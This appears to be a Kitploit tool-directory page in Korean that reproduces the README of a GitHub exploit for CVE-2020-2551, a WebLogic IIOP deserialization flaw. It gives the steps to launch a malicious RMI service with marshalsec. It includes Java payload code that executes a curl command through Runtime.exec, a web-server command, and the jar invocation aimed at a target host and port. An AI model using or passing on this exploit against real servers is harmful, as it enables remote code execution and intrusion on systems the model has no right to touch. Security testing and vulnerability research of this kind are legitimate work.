Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2020-2551 — Weblogic IIOP CVE-2020-2551 | Kitploit
도구/GitHubGitHub/y4er/cve-2020-2551
Vulnerability AnalysisExploitationWeb Application ExploitationCommand and ControlRemote Access ToolPayload Development
GitHuby4er/cve-2020-2551

CVE-2020-2551

Weblogic IIOP CVE-2020-2551

저장소 보기
336786년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2020-2551

Weblogic IIOP 역직렬화

테스트 환경

Weblogic10.3.6+jdk1.6

패키징된 jar 파일 추출 코드:a6ob

취약점 악용

jar 파일을 다운로드한 후 marshalsec을 사용하여 악성 RMI 서비스를 시작하고 로컬에서 exp.java를 컴파일합니다.

root@kitploit:~
package payload;

import java.io.IOException;

public class exp {

    public exp() {
        String cmd = "curl http://172.16.1.1/success";
        try {
            Runtime.getRuntime().exec(cmd).getInputStream();
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}

weblogic과 동일한 jdk 버전 및 종속 라이브러리(wlfullclient.jar)를 사용하여 컴파일하는 것이 좋습니다. 그런 다음 로컬에서 웹 서버를 시작합니다.

root@kitploit:~
python -m http.server --bind 0.0.0.0 80

명령줄에서 jar 파일 실행

root@kitploit:~
java -jar weblogic_CVE_2020_2551.jar 172.16.1.128 7001 rmi://172.16.1.1:1099/exp

실제 효과는 아래와 같습니다. image

알려진 문제

많은 분들이 재현에 실패했다고 말합니다. 인터넷의 일부 글을 보니 IIOP에 NAT 모드 문제가 있는 것으로 확인되었습니다. 오늘 先知(선즈)에서 이 내용을 발견했습니다: https://xz.aliyun.com/t/7498 각자 직접 확인해 보세요.

참고

https://y4er.com/post/weblogic-cve-2020-2551/

도구 다운로드